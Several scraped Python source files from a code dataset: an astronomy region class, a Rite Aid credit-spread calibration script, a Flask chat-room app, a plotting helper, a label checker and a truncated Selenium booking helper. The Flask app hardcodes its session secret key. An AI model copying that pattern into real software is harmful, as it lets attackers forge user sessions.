server.stop()\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"600621957","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\nfrom __future__ import absolute_import, division, print_function, unicode_literals\nfrom . import PixCoord, PixelRegion, SkyRegion, BoundingBox, Mask\nimport numpy as np\n\n__all__ = ['CompoundPixelRegion', 'CompoundSkyRegion']\n\n\nclass CompoundPixelRegion(PixelRegion):\n \"\"\"\n Represents the logical combination of two regions in pixel coordinates.\n \"\"\"\n\n def __init__(self, region1, region2, operator, meta=None, visual=None):\n if not isinstance(region1, PixelRegion):\n raise TypeError(\"region1 must be a PixelRegion\")\n if not isinstance(region2, PixelRegion):\n raise TypeError(\"region2 must be a PixelRegion\")\n if not callable(operator):\n raise TypeError(\"operator must be callable\")\n\n self.region1 = region1\n self.region2 = region2\n if meta is None:\n self.meta = region1.meta\n else:\n self.meta = meta\n if visual is None:\n self.visual = region1.visual\n else:\n self.visual = visual\n self.operator = operator\n self._repr_params = [('component 1', self.region1),\n ('component 2', self.region2),\n ('operator', self.operator),\n ]\n\n def contains(self, pixcoord):\n in_reg = self.operator(self.region1.contains(pixcoord), self.region2.contains(pixcoord))\n if self.meta.get('inverted', False):\n return not in_reg\n else:\n return in_reg\n\n def to_mask(self, mode='center', subpixels=1):\n if mode != 'center':\n raise NotImplementedError\n\n mask1 = self.region1.to_mask(mode=mode, subpixels=subpixels)\n mask2 = self.region2.to_mask(mode=mode, subpixels=subpixels)\n\n # Common bounding box\n bbox = BoundingBox(\n ixmin=min(mask1.bbox.ixmin, mask2.bbox.ixmin),\n ixmax=max(mask1.bbox.ixmax, mask2.bbox.ixmax),\n iymin=min(mask1.bbox.iymin, mask2.bbox.iymin),\n iymax=max(mask1.bbox.iymax, mask2.bbox.iymax)\n )\n\n # Bounding boxes must not extend over array, see #168\n bbox_borders = np.array([bbox.ixmin, bbox.ixmax, bbox.iymin, bbox.iymax])\n if (bbox_borders < 0).any():\n raise NotImplementedError(\"Bounding box must be within array for \"\n \"compound regions, see #168\")\n\n # Pad mask1.data and mask2.data to get the same shape\n padded_data = list()\n for mask in (mask1, mask2):\n pleft = mask.bbox.ixmin - bbox.ixmin\n pright = bbox.ixmax - mask.bbox.ixmax\n ptop = bbox.iymax - mask.bbox.iymax\n pbottom = mask.bbox.iymin - bbox.iymin\n padded_data.append(np.pad(mask.data,\n ((ptop, pbottom), (pleft, pright)),\n 'constant'))\n\n data = self.operator(*np.array(padded_data, dtype=np.int))\n return Mask(data=data, bbox=bbox)\n\n def to_sky(self, wcs):\n skyreg1 = self.region1.to_sky(wcs=wcs)\n skyreg2 = self.region2.to_sky(wcs=wcs)\n return CompoundSkyRegion(region1=skyreg1,\n operator=self.operator,\n region2=skyreg2, meta=self.meta, visual=self.visual)\n\n def as_patch(self, **kwargs):\n raise NotImplementedError\n\n def to_shapely(self, **kwargs):\n raise NotImplementedError\n\n def bounding_box(self, **kwargs):\n raise NotImplementedError\n\n @property\n def area(self):\n raise NotImplementedError\n\n\nclass CompoundSkyRegion(SkyRegion):\n \"\"\"\n Represents the logical combination of two regions in sky coordinates.\n \"\"\"\n\n def __init__(self, region1, region2, operator, meta=None, visual=None):\n if not isinstance(region1, SkyRegion):\n raise TypeError(\"region1 must be a SkyRegion\")\n if not isinstance(region2, SkyRegion):\n raise TypeError(\"region2 must be a SkyRegion\")\n if not callable(operator):\n raise TypeError(\"operator must be callable\")\n\n self.region1 = region1\n self.region2 = region2\n if meta is None:\n self.meta = region1.meta\n else:\n self.meta = meta\n if visual is None:\n self.visual = region1.visual\n else:\n self.visual = visual\n self.operator = operator\n\n self._repr_params = [('component 1', self.region1),\n ('component 2', self.region2),\n ('operator', self.operator),\n ]\n\n def contains(self, skycoord, wcs):\n in_reg = self.operator(self.region1.contains(skycoord, wcs),\n self.region2.contains(skycoord, wcs))\n if self.meta.get('inverted', False):\n return not in_reg\n else:\n return in_reg\n\n def to_pixel(self, wcs):\n pixreg1 = self.region1.to_pixel(wcs=wcs)\n pixreg2 = self.region2.to_pixel(wcs=wcs)\n return CompoundPixelRegion(region1=pixreg1,\n operator=self.operator,\n region2=pixreg2, meta=self.meta, visual=self.visual)\n\n def as_patch(self, ax, **kwargs):\n raise NotImplementedError\n","sub_path":"regions/core/compound.py","file_name":"compound.py","file_ext":"py","file_size_in_byte":5405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"9407088","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCDS Research\nAuthor: Jordan Giebas\nAdvisor: Dr. Albert Cohen\nMichigan State University\nMarch 16, 2017\n\nCompany: Frontier Communications Corp.\n\n\"\"\"\n\nimport matplotlib.pyplot as plt\n\n# Working with Excel\nimport xlrd\n\n# Datetime Module for time-series data\nimport datetime\n\n# Mathematical Computations\nimport math\nfrom scipy.stats import norm\nfrom scipy.optimize import fsolve\n\n\ndef averageOfList( List1 ):\n \n return sum(List1)/float(len(List1))\n\ndef firstDayCheck( day_month_String ):\n \n firstDayList = [\"01-01\", \"01-04\", \"01-07\", \"01-10\"]\n \n if day_month_String in firstDayList:\n \n return True\n \n return False\n\ndef secondDayCheck( day_month_String ):\n \n secondDayList = [\"02-01\", \"02-04\", \"02-07\", \"02-10\"]\n \n if day_month_String in secondDayList:\n \n return True\n \n return False\n\ndef thirdDayCheck( day_month_String ):\n \n thirdDayList = [\"03-01\", \"03-04\", \"03-07\", \"03-10\"]\n \n if day_month_String in thirdDayList:\n \n return True\n \n return False\n\ndef fourthDayCheck( day_month_String ):\n \n fourthDayList = [\"04-01\", \"04-04\", \"04-07\", \"04-10\"]\n \n if day_month_String in fourthDayList:\n \n return True\n \n return False\n \ndef notWeekendCheck( dayString ):\n \n weekendList = [\"Saturday\", \"Sunday\"]\n \n if dayString in weekendList:\n \n return False\n \n return True\n\n# Input Param: \ndef dateToQuarter( dateString ):\n\n Q1_list = [\"01\", \"02\", \"03\"] \n Q2_list = [\"04\", \"05\", \"06\"] \n Q3_list = [\"07\", \"08\", \"09\"] \n \n L = dateString.split(\"-\")\n Month = L[1]\n #print(\"Month: \", Month)\n Year = L[2]\n #print(\"Year: \", Year)\n \n if Month in Q1_list:\n \n return \"1.\" + Year\n \n elif Month in Q2_list:\n \n return \"2.\" + Year\n\n elif Month in Q3_list:\n \n return \"3.\" + Year\n \n else:\n \n return \"4.\" + Year \n \n \n## E^Market = A*phi(d1) - N*e^M*phi(d2)\ndef fsolve_function( init, E_market, sigma_E_market, r, M, A):\n\n sigma_A = init[0]\n N = init[1]\n\n #Aux functions\n d1 = (math.log(A/N) + (r + 0.5*(sigma_A**2))*M)/(sigma_A*math.sqrt(M))\n d2 = (math.log(A/N) + (r - 0.5*(sigma_A**2)))/(sigma_A*math.sqrt(M))\n \n #return\n #out = A*norm.cdf(d1) - N*math.exp(-1*(r*M))*norm.cdf(d2) - E_market\n #out = sigma_E_market - sigma_A*A*norm.cdf(d1)\n out = [A*norm.cdf(d1) - N*math.exp(-1*(r*M))*norm.cdf(d2) - E_market]\n out.append(sigma_A*A*norm.cdf(d1) - sigma_E_market*E_market)\n\n return out\n\n\ndef delta_spread( A, calib_sigma_A, E_market, sigma_E_market, calibN, r, M, spd ):\n \n d1 = (math.log(A/calibN) + ((r + 0.5*(CalibSigA**2))*M))/(CalibSigA*math.sqrt(M))\n d2 = (math.log(A/calibN) + ((r - 0.5*(CalibSigA**2))*M))/(CalibSigA*math.sqrt(M)) \n \n spread_calib = (-1.0/M)*math.log( norm.cdf(d2) + ((A*math.exp(r*M))/calibN)*norm.cdf(-1.0*d1) )\n spread_calib *= 10000.0\n \n #return (spd-spread_calib2)\n return [(spd-spread_calib), spread_calib]\n\n\n#establish the map between quarter and paramteres for Beazer Home\n# map[quarter] = list[ STD, LTD, B (liabilities), E (Equity), sigma_E (volatility), r (10 Yr Treasury Rate), Credit_Spread ]\nquarterToData = dict()\n\n# Open the Excel Workbook, read in short term debt\nbook = xlrd.open_workbook( \"RiteAid_1factor.xlsx\" )\nSTD_data = book.sheet_by_index(0) # sheet containing Short Term Debt Data (Quarterly)\nLTD_data = book.sheet_by_index(1) # sheet containing Long Term Debt Data (Quarterly)\nLib_data = book.sheet_by_index(2) # sheet containing Liability Data (Quarterly)\nEqt_data = book.sheet_by_index(3) # sheet containing Equity Data (Quarterly)\nVol_data = book.sheet_by_index(4) # sheet containing Volatility Data (Daily)\nRte_data = book.sheet_by_index(5) # sheet containing 10 Yr Treasury Data (Daily)\nSpd_data = book.sheet_by_index(6) # sheet containing Spread Data (Daily)\nBta_data = book.sheet_by_index(7) # sheet containing BetaEM Data (Daily)\nFsp_data = book.sheet_by_index(8) # sheet containing Final Stock Price Data (Daily)\n\n\n###########################################\n#\n# First process everything that's daily\n# And put it in the date=>data map\n#\n###########################################\n\ndateToData = dict()\ndateWeekendBool = dict()\ndateList = list()\n\n## process volatility data\ndates = Vol_data.col_slice( colx=0, start_rowx=0 )\nnEntries = len(dates)\n\nfor i in range( 0, nEntries ):\n \n ## Put in volatility data \n date_i_float = Vol_data.cell_value(i,0)\n date_i = datetime.datetime( *xlrd.xldate_as_tuple( date_i_float, book.datemode ) ).strftime(\"%A %d. %B %Y\")\n date_i_formatted = datetime.datetime( *xlrd.xldate_as_tuple( date_i_float, book.datemode ) ).strftime('%d-%m-%Y')\n day = date_i.split(\" \")[0]\n \n dateList.append( date_i_formatted )\n \n if notWeekendCheck( day ):\n \n dateWeekendBool[ date_i_formatted ] = True\n\n dateToData[ date_i_formatted ] = [ day ]\n dateToData[ date_i_formatted ].append( float( Vol_data.cell_value( i,1 ) ) )\n dateToData[ date_i_formatted ].append( float( Spd_data.cell_value( i,1 ) ) )\n dateToData[ date_i_formatted ].append( float( Bta_data.cell_value( i,1 ) ) )\n dateToData[ date_i_formatted ].append( float( Fsp_data.cell_value( i,1 ) ) )\n \n else:\n \n dateWeekendBool[ date_i_formatted ]= False\n \n\n## Put in the treasury data\ndates_Rte = Rte_data.col_slice( colx=0, start_rowx=0 )\nnEntries_Rte = len( dates_Rte )\nfor i in range( 0, nEntries_Rte ):\n \n date_i_float_rte = Rte_data.cell_value(i,0)\n date_i_formatted_rte = datetime.datetime( *xlrd.xldate_as_tuple( date_i_float_rte, book.datemode ) ).strftime('%d-%m-%Y') \n dateToData[ date_i_formatted_rte ].append( float( Rte_data.cell_value( i,1 ) ) )\n\n\n###################################################\n# @ this point, all the daily data\n# is in the map. Need to get the quarterlies\n# map: date => [ vol, spd, bta, fsp, rte ]\n###################################################\n\n## Put in the liability data (STD,LTD maybe)\nquarterToSomeData = dict()\n\nquarters = STD_data.col_slice( colx=0, start_rowx=0 )\nnEntries_q = len( quarters )\n\nfor i in range( 0, nEntries_q ):\n \n quarter_i = str( STD_data.cell_value( i, 0 ) )\n quarter_i_formatted = quarter_i[2] + \".\" + quarter_i[4:]\n \n quarterToSomeData[ quarter_i_formatted ] = [ float( Lib_data.cell_value( i, 1 ) ) ]\n quarterToSomeData[ quarter_i_formatted ].append( float( STD_data.cell_value( i, 1 ) ) )\n quarterToSomeData[ quarter_i_formatted ].append( float( LTD_data.cell_value( i, 1 ) ) )\n\n\n\n###################################################\n# @ this point, the quarterToSomeData\n# map maps quarter=> [lib, std, ltd]\n# we need to go through each date in the \n# dateToData map, and see what quarter it's in. \n# reference this quarter, and put each value in the \n# dateToData map\n###################################################\n\nfor date in dateToData:\n \n ## get values\n for elm in quarterToSomeData[ dateToQuarter(date) ]:\n \n dateToData[ date ].append( elm )\n \n\n###################################################\n# @ this point, the dateToData map contains\n# everything except Equity, the special case.\n# Set up the equity map first, \n# quarter to Equity values\n###################################################\n\n## Put in the Equity data\nquarterToEquity = dict()\n\nquarters_Eqt = Eqt_data.col_slice( colx=0, start_rowx=0 )\nnEntries_Eqt = len( quarters_Eqt )\n\nfor i in range( 0, nEntries_Eqt ):\n \n quarter_i = str( Eqt_data.cell_value( i, 0 ) )\n quarter_i_formatted = quarter_i[2] + \".\" + quarter_i[4:]\n \n quarterToEquity[ quarter_i_formatted ] = float( Eqt_data.cell_value( i, 1 ) )\n\n\n###################################################\n# @ this point, the quarterToEquity map\n# is set up. Set up quarter=>#ofShares map\n###################################################\n\n## Put in number shares\nquarterToNumShares = dict()\n \nfor i in range( 0, len(dateList) ):\n \n date = dateList[i]\n \n weekend_check = dateWeekendBool[date]\n day_month = date[:-5]\n \n if firstDayCheck( day_month ) and (weekend_check==True):\n \n quarter = dateToQuarter( date )\n fsp = dateToData[ date ][4]\n Equity_val = quarterToEquity[ quarter ]\n numShares = Equity_val*1000000/float(fsp)\n\n # insert into quarterToNumShares map\n quarterToNumShares[ quarter ] = numShares\n \n if firstDayCheck( day_month ) and (weekend_check==False):\n \n temp_i = i #save the location of i\n while( dateWeekendBool[ dateList[i] ] == False ):\n \n i+=1\n \n date_i = dateList[i] #save the next non-weekend date\n i = temp_i #refresh to true position of i\n \n quarter = dateToQuarter( date_i )\n fsp = dateToData[ date_i ][4]\n Equity_val = quarterToEquity[ quarter ]\n numShares = Equity_val*1000000/float(fsp)\n\n # insert into quarterToNumShares map\n quarterToNumShares[ quarter ] = numShares\n \n\n###################################################\n# @ this point, the quarterToNumShares map\n# is set up. Now we just need to put Equity\n# into the dateToData map\n###################################################\n\nfor date in dateToData:\n \n quarter = dateToQuarter( date )\n numShares = quarterToNumShares[ quarter ]\n \n dateToData[date].append(numShares)\n \n\n#print(dateToData)\n\n###################################################\n# @ this point, everything is in the dataFrame\n# just need to do math\n###################################################\n \n#############################################\n# Now that all the data is centralized,\n# use the paramters to do the computations\n#############################################\n\n\nA_init = 70000000\nsigmaA_init = 0.2\ninit_guess = [A_init, sigmaA_init]\nM = 5.0 # assume\n\n\noutFile = open('riteAid_testingFile.csv','w')\nbetaBM_List = list()\nfor k in dateToData.keys():\n \n #define input parameters for calibration\n sig_E = dateToData[k][1]/100.0\n spd = dateToData[k][2]\n bta = dateToData[k][3]\n fsp = dateToData[k][4]\n r = dateToData[k][5]/100.0\n B = dateToData[k][6]*1000000\n STD = dateToData[k][7]*1000000\n LTD = dateToData[k][8]*1000000\n numShares = dateToData[k][9]\n E = float(fsp*numShares)*1000000\n N_Moody = STD+0.5*LTD \n N_Liab = B\n A = B + E\n \n initial_guess = [0.2, N_Moody]\n\n if (spd != 0.0):\n \n try:\n \n CalibSigA, CalibN = fsolve( fsolve_function, initial_guess, args=(E, sig_E, r, M, A) )\n \n \"\"\" \n print(\"\\n====DEBUG====\")\n print(\"sigE: \", sig_E)\n print(\"spd_phys: \", spd)\n print(\"beta_EM: \", bta)\n print(\"fStockPrice: \", fsp)\n print(\"rate: \", r)\n print(\"Liabilities: \", B)\n print(\"STD: \", STD)\n print(\"LTD: \", LTD)\n print(\"N_Moodys: \", N_Moody)\n print(\"N_Moodys/B: \", N_Moody/float(B))\n print(\"Equity: \", E)\n print(\"CalibSigA: \", CalibSigA)\n print(\"CalibN: \", CalibN)\n print(\"B/CalibN: \", B/float(CalibN))\n \"\"\"\n \n ## Get d1/d2\n d1 = (math.log(A/CalibN) + ((r + 0.5*(CalibSigA**2))*M))/(CalibSigA*math.sqrt(M))\n d2 = (math.log(A/CalibN) + ((r - 0.5*(CalibSigA**2))*M))/(CalibSigA*math.sqrt(M)) \n \n beta_BM = (E*norm.cdf(-1.0*d1)*bta)/float(B*norm.cdf(d1))\n phi_d1 = norm.cdf(d1)\n \n if (beta_BM < 0):\n \n print(\"\\n====DEBUG====\")\n print(\"sigE: \", sig_E)\n print(\"spd_phys: \", spd)\n print(\"beta_EM: \", bta)\n print(\"rate: \", r)\n print(\"Liabilities: \", B)\n print(\"STD: \", STD)\n print(\"LTD: \", LTD)\n print(\"N_Moodys: \", N_Moody)\n print(\"N_Moodys/B: \", N_Moody/float(B))\n print(\"numShares: \", numShares)\n print(\"fStockPrice: \", fsp)\n print(\"Equity: \", E)\n print(\"CalibSigA: \", CalibSigA)\n print(\"CalibN: \", CalibN)\n print(\"B/CalibN: \", B/float(CalibN))\n print(\"beta_BM: \", beta_BM)\n \n# print(\"\\n====DEBUG====\")\n# print(\"CalibSigA: \", CalibSigA)\n# print(\"CalibN: \", CalibN)\n# print(\"beta_BM: \", beta_BM)\n \n betaBM_List.append(beta_BM)\n \n ## Calculate S^Physical - S^Calibrate\n d_spread, calib_spread = delta_spread( A, CalibSigA, E, sig_E, CalibN, r, M, spd )\n \n #print(\"deltaSpread: \", d_spread)\n\n outStr = str(bta) + \",\" + str(beta_BM) + \",\" + str(d_spread) + \",\" + str(spd) + \",\" + str(calib_spread) + \"\\n\"\n outFile.write( outStr )\n\n \"\"\"\n ## Get LGD / Beta_BM (Beta_EM*constants)\n LGD = 1.0 - ( ( math.exp(r*M) * A * norm.cdf(-d1) ) / ( N*norm.cdf(-d2) ) )\n PD = norm.cdf(-d1)\n #bta_BM = ( (norm.cdf(-d1)*E*1000000*bta) / (float(B*norm.cdf(d1))) )\n bta_BM = ( (norm.cdf(-d1)*E*1000000*bta) / (float(B*norm.cdf(d1))) )\n #print(\"Beta_BM: \", bta_BM)\n \n# print(\"\\n SigA: \", CalibSigA)\n# print(\"Beta_BM: \", bta_BM)\n\n \n beta_BM_list.append(bta_BM)\n beta_EM_list.append(bta)\n \n ## Output, all files\n out_str = str(bta_BM) + \",\" + str(bta) + \",\" + str(d_spread) + \"\\n\"\n fc_dspreadFile2.write( out_str )\n \n out_str2 = str(bta) + \",\" + str(LGD) + \",\" + str(PD) + \"\\n\"\n fc_PdFile.write( out_str2 )\n \n out_str3 = k + \",\" + str(PD) + \",\" + str(spd) + \"\\n\"\n fc_PdSpread.write( out_str3 )\n \n out_str4 = str(PD) + \",\" + str(LGD) + \"\\n\"\n last_doc.write( out_str4 )\n \n out_str5 = str(cnt) + \",\" + str(PD) + \"\\n\"\n fc_TimeSeries.write( out_str5 )\n \n out_str6 = str(E) + \",\" + str(spd) + \"\\n\"\n fc_betaEBFile.write( out_str6 )\n \n out_str7 = str(CalibSigA) + \",\" + str(bta_BM) + \"\\n\"\n sigA_BtaBM.write( out_str7 )\n \n #count_list.append(cnt)\n cnt+=1\n \n \"\"\"\n \n except ValueError:\n \n continue\n \n \n\n#print(\"\\nbetaBM_List_avg: \", sum(betaBM_List)/float(len(betaBM_List)))\n\n#fc_dspreadFile2.close()\n#fc_PdFile.close()\n#fc_PdSpread.close()\n#last_doc.close()\n#fc_betaEBFile.close()\n","sub_path":"RiteAid/RiteAid_5_9_2017.py","file_name":"RiteAid_5_9_2017.py","file_ext":"py","file_size_in_byte":15007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"384030189","text":"from flask import Flask, redirect, render_template, request, url_for\nfrom flask_login import LoginManager, current_user, login_required, login_user, logout_user\nfrom flask_socketio import SocketIO, join_room, leave_room, send\nfrom db import (add_room_members, get_messages, get_user, save_msg, save_room,\n save_user, get_rooms_for_user, get_room, is_room_member,\n get_room_members, is_room_admin, update_room, remove_room_members,\n update_admin, remove_admin, add_room_member, remove_room_member,\n check_user, get_email, delete_room)\nfrom datetime import datetime\nfrom bson.json_util import dumps\n\n\napp = Flask(__name__)\napp.secret_key = 'Centigrade'\nsocketio = SocketIO(app)\nlogin_manager = LoginManager()\nlogin_manager.login_view = 'login'\nlogin_manager.init_app(app)\n\n\n@app.route('/')\ndef home():\n rooms = []\n have_rooms = False\n\n if current_user.is_authenticated:\n rooms = get_rooms_for_user(current_user.username)\n a = len(rooms)\n if a == 0:\n have_rooms = False\n else:\n have_rooms = True\n return render_template('index.html', rooms=rooms, have_rooms=have_rooms)\n\n\n@app.route('/login', methods=[\"GET\", \"POST\"])\ndef login():\n if current_user.is_authenticated:\n return redirect(url_for('home'))\n message = ''\n if request.method == \"POST\":\n username = request.form.get('username')\n password_input = request.form.get('password')\n user = get_user(username)\n\n if user and user.check_password(password_input):\n login_user(user)\n return redirect(url_for('home', username=current_user.username))\n else:\n message = 'Failed to login'\n\n return render_template('login.html', message=message)\n\n\n@app.route('/signup', methods=[\"GET\", \"POST\"])\ndef signup():\n message = ''\n if request.method == \"POST\":\n username = request.form.get('username')\n password = request.form.get('password')\n email_address = request.form.get('email')\n user = get_user(username)\n message = 'ㅤ'\n if user:\n message = '{} already exist'.format(username)\n else:\n save_user(username, password, email_address)\n\n return redirect(url_for('login'))\n\n return render_template('signup.html', message=message)\n\n\n@app.route('/logout')\n@login_required\ndef logout():\n logout_user()\n return redirect(url_for('home'))\n\n\n@app.route('/', methods=[\"GET\", \"POST\"])\n@login_required\ndef create_room():\n message = ''\n rooms = get_rooms_for_user(current_user.username)\n if request.method == \"POST\":\n room_name = request.form.get('room_name')\n usernames = [username.strip()\n for username in request.form.get('members').split(',')]\n\n if len(room_name):\n for username in usernames:\n user = check_user(username)\n if username == \"\": \n \n break\n elif user ==None :\n print(\"bruhh\")\n message = f\"user:\\\"{username}\\\" doesn't exist\"\n return render_template('index.html', message1=message, have_rooms=True, rooms=rooms)\n break\n room_id = save_room(room_name, current_user.username)\n if current_user.username in usernames:\n usernames.remove(current_user.username)\n add_room_members(room_id, room_name, usernames,\n current_user.username)\n return redirect(url_for('chat_room', room_id=room_id))\n else:\n message = 'Failed to Create room'\n\n return render_template('index.html', message1=message, have_rooms=True, rooms=rooms)\n\n\n@app.route('/rooms/<room_id>/edit', methods=[\"POST\", \"GET\"])\n@login_required\ndef edit_room(room_id):\n room = get_room(room_id)\n admins = []\n not_admin = []\n error_msg = ''\n message = ''\n if room and is_room_admin(room_id, current_user.username):\n\n members = get_room_members(room_id)\n members_list = [username['_id']['username'] for username in members]\n for member in members:\n if is_room_admin(room_id, member['_id']['username']):\n admins.append(member['_id']['username'])\n else:\n not_admin.append(member['_id']['username'])\n if request.method == \"POST\":\n room_name = request.form.get('room_name')\n room['name'] = room_name\n update_room(room_id, room_name)\n make_admin = request.form.get('makeAdmin')\n removeAdmin = request.form.get('removeAdmin')\n add_member = request.form.get('addmember')\n rem_mem = request.form.get('remove_user')\n rem_room = request.form.get('delete_room')\n\n if make_admin:\n try:\n update_admin(room_id, make_admin)\n message = '{} is now an Admin🥳'.format(make_admin)\n except:\n error_msg = 'Some error occured'\n\n if removeAdmin:\n try:\n if len(admins) > 1:\n remove_admin(room_id, removeAdmin)\n message = '{} is no longer an Admin'.format(\n removeAdmin)\n else:\n message = 'Atleast one admin should be present'\n except:\n error_msg = 'Some error occured'\n\n if add_member:\n try:\n user = check_user(add_member)\n if user:\n if add_member not in members_list:\n add_mems = [username.strip()\n for username in add_member.split(',')]\n add_room_members(room_id, room_name, add_mems,\n current_user.username)\n message = '\\\"{}\\\" added successfully'.format(\n add_member)\n else:\n message = \"\\\"{}\\\" already in room\".format(\n add_member)\n else:\n message = \"\\\"{}\\\" does not exist :(\".format(add_member)\n except:\n error_msg = \"Some error occured\"\n\n if rem_mem:\n is_admin = is_room_admin(room_id, rem_mem)\n try:\n if len(members_list) > 1:\n if is_admin and len(admins) == 1:\n message = 'Atleast one Admin should be present '\n else:\n remove_room_member(room_id, rem_mem)\n message = '{} removed successfully'.format(rem_mem)\n else:\n message = 'Atleast one member should be present'\n except:\n error_msg = \"Some error occured\"\n if rem_room == 'Remove':\n try:\n for member in members_list:\n print(\"hi\")\n remove_room_member(room_id, member)\n delete_room(room_id)\n return redirect(url_for('home'))\n\n except:\n error_msg = \"Some error oocured\"\n\n # return redirect(url_for('edit_room',room_id=room_id,message = message))\n\n return render_template('edit_room.html', not_admin=not_admin, admins=admins, room=room, members=members, error_msg=error_msg, room_id=room_id, message=message)\n\n else:\n return render_template('404.html', message='Only admins can Edit Room', room_id=room_id)\n\n\n@app.route('/rooms/<room_id>/')\n@login_required\ndef chat_room(room_id):\n rooms = get_rooms_for_user(current_user.username)\n room = get_room(room_id)\n email = get_email(current_user.username)\n admins = []\n not_admin = []\n if room and is_room_member(room_id, current_user.username):\n room_members = get_room_members(room_id)\n for member in room_members:\n if is_room_admin(room_id, member['_id']['username']):\n admins.append(member['_id']['username'])\n else:\n not_admin.append(member['_id']['username'])\n\n messages = get_messages(room_id)\n return render_template('chat.html', admins=admins, rooms=rooms, username=current_user.username, not_admin=not_admin, email=email, room=room, room_members=room_members, room_id=room_id, messages=messages)\n else:\n\n return render_template('404.html', message='Room does not exist')\n\n\n\"\"\" @app.route('/rooms/<room_id>/messages/')\n@login_required\ndef get_older_message(room_id):\n room = get_room(room_id)\n if room and is_room_member(room_id, current_user.username):\n page = int(request.args.get('page', 0))\n messages = get_messages(room_id, page)\n return dumps(messages)\n else:\n return \"Room not found\", 404\n \"\"\"\n\n\n@socketio.on('send_msg')\ndef handle_send_message_event(data):\n data['created_at'] = datetime.now().strftime(\"%d %b, %H:%M \")\n save_msg(data['room'], data['message'], data['username'])\n socketio.emit('receive_msg', data, room=data['room'])\n\n\n@socketio.on('leave_room')\ndef leaving_room(data):\n remove_room_member(data['room'], current_user.username)\n leave_room(data['room'])\n socketio.emit('leave_room_announcement', data, room=data['room'])\n\n\n@socketio.on('join_room')\ndef joinning_room(data):\n messages = get_messages(data['room'])\n join_room(data['room'])\n socketio.emit('join_room_announcement', data,\n room=data['room'], messages=messages)\n\n\n@login_manager.user_loader\ndef load_user(username):\n return get_user(username)\n\n\nif __name__ == \"__main__\":\n socketio.run(app, host='0.0.0.0') # uncomment this before deployment\n # comment this before deployment (this is used for running debug server)\n #socketio.run(app, debug=\"True\")\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":10115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"334449739","text":"from prettyplotlib.utils import remove_chartjunk, maybe_get_ax, maybe_get_linewidth\nfrom prettyplotlib.colors import almost_black, pretty\n\n\n@pretty\ndef fill_between(*args, **kwargs):\n ax, args, kwargs = maybe_get_ax(*args, **kwargs)\n\n lw = maybe_get_linewidth(**kwargs)\n kwargs['linewidths'] = lw\n\n if 'color' not in kwargs:\n # if no color is specified, cycle over the ones in this axis\n color_cycle = ax._get_lines.color_cycle\n kwargs['color'] = next(color_cycle)\n if 'edgecolor' not in kwargs:\n kwargs['edgecolor'] = almost_black\n\n show_ticks = kwargs.pop('show_ticks', False)\n\n lines = ax.fill_between(*args, **kwargs)\n remove_chartjunk(ax, ['top', 'right'], show_ticks=show_ticks)\n return ax\n","sub_path":"prettyplotlib/_fill_between.py","file_name":"_fill_between.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"413172766","text":"#coding:utf-8\n\nimport numpy as np\nimport sys\nimport os\nimport cv2\nfrom tqdm import tqdm\nfrom ulitities.base_functions import load_img, get_file\n\nFLAG_USING_UNET = True\nsegnet_labels = [0, 1, 2] # have not test for segnetlabels\nunet_labels = [0, 1]\n\ninput_src_path = '../../data/originaldata/unet/roads/src/'\ninput_label_path = '../../data/originaldata/unet/roads/label/'\n\nHAS_INVALID_VALUE = False\n\n\ndef make_label_valid(img, true_values):\n height, width = img.shape\n for i in range(height):\n for j in range(width):\n tmp = img[i,j]\n if not tmp in true_values:\n print(\"img[{},{}]: {}\".format(i,j,tmp))\n img[i,j]=0\n return img\n\n\nif __name__ == '__main__':\n src_files,num = get_file(input_src_path)\n assert (num!=0)\n\n valid_labels = []\n if FLAG_USING_UNET:\n valid_labels = unet_labels\n else:\n valid_labels = segnet_labels\n\n for src_file in tqdm(src_files):\n label_file = input_label_path + os.path.split(src_file)[1]\n\n ret,src_img = load_img(src_file)\n assert(ret==0)\n\n ret,label_img = load_img(label_file, grayscale=True)\n assert (ret == 0)\n\n local_labels = np.unique(label_img)\n\n for tmp in local_labels:\n if tmp not in valid_labels:\n print (\"\\nWarning: some label is not valid value\")\n print (\"\\nFile: {}\".format(label_file))\n HAS_INVALID_VALUE = True\n\n\n if HAS_INVALID_VALUE == True:\n new_label_img = make_label_valid(label_img, valid_labels)\n cv2.imwrite(label_file, new_label_img)\n HAS_INVALID_VALUE = False\n\n\n\n\n\n","sub_path":"samples_produce/check_original_labels.py","file_name":"check_original_labels.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"286668998","text":"from selenium.webdriver.remote.webdriver import WebDriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.remote.webelement import WebElement\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.wait import WebDriverWait\n\nclass Reservation_Manager:\n def __init__(self, driver: WebDriver):\n self.driver = driver\n \n def new_reservation(self):\n reservation_element = WebDriverWait(self.driver,10).until(\n EC.element_to_be_clickable(\n (By.CSS_SELECTOR, 'img[alt=\"Prenota il tuo posto a lezione\"]'))\n )\n self.driver.execute_script(\"arguments[0].scrollIntoView(true);\", reservation_element)\n reservation_element.click()\n\n new_reservation_element = self.driver.find_element_by_css_selector(\n 'img[src=\"customer/sub_home_icons/easylesson_aggiungi.png\"]'\n )\n new_reservation_element.click()\n\n def get_lessons(self):\n lessons_elements = self.driver.find_elements_by_css_selector(\n 'a[title=\"Verifica e prenota il tuo posto\"]'\n )\n lessons_elements_booked = self.driver.find_elements_by_css_selector(\n 'a[title=\"Annulla la tua prenotazione\"]'\n )\n\n lessons_id = [\n lessons_element.get_attribute(\"id\") \n for lessons_element in lessons_elements \n if lessons_element.get_attribute(\"id\") not in lessons_elements_booked\n ]\n\n return lessons_id\n \n def make_reservation(self, lessons_id: list):\n self.lessons_id = 